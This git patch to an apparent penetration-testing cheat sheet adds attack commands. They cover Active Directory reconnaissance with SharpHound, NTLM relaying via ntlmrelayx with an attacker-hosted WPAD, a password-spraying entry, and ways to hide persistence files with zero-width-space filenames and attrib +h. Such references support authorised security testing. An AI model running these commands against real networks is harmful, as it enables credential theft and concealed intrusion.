From be0397fa688137798146782e8a157139f313f2f1 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 19 Jan 2020 22:46:45 +0100
Subject: [PATCH] BloodHound ZIP + Zero Width space tip
---
 Methodology and Resources/Active Directory Attack.md | 9 ++++++---
 Methodology and Resources/Linux - Persistence.md | 8 +++++++-
 Methodology and Resources/Windows - Persistence.md | 6 ++++++
 3 files changed, 19 insertions(+), 4 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 0ec49c3..2ca3d36 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -77,6 +77,8 @@
  SharpHound.exe (from resources/Ingestor)
  SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
  SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
+ SharpHound.exe -c all -d active.htb -SearchForest
+ SharpHound.exe --EncryptZip --ZipFilename export.zip
  or
  Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
  or
@@ -112,6 +114,7 @@
  # -wh: Server hosting WPAD file (Attacker’s IP)
  # -t: Target (You cannot relay credentials to the same device that you’re spoofing)
  # -i: open an interactive shell
+ ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
  ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
@@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
 Most of the time the best passwords to spray are :
-- Password123, mimikatz
+- P@ssw0rd01, Password123, mimikatz
 - Welcome1/Welcome01
 - $Companyname1 : $Microsoft1
 - SeasonYear : Winter2019*,Spring2020!,Summer2018? 
@@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
 mitm6 -i eth0 -d $domain
 # spoofing WPAD and relaying NTLM credentials
-http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
+ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
 or
-http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
+ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
 ```
 #### Drop the MIC
diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md
index f84fc8e..7007e2c 100644
--- a/Methodology and Resources/Linux - Persistence.md
+++ b/Methodology and Resources/Linux - Persistence.md
@@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
 Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
-```bash
+```powershell
 ## Do not remove. Generated from /etc/issue.conf by configure.
 ```
+Hide in plain sight using zero width spaces in filename.
+
+```powershell
+touch $(echo -n 'index\u200D.php') index.php
+```
+
 Clear the last line of the history.
 ```bash
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index ea1ccb7..69986f5 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -21,6 +21,12 @@
 ## Userland
+Set a file as hidden
+
+```powershell
+attrib +h c:\autoexec.bat
+```
+
 ### Registry
 Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.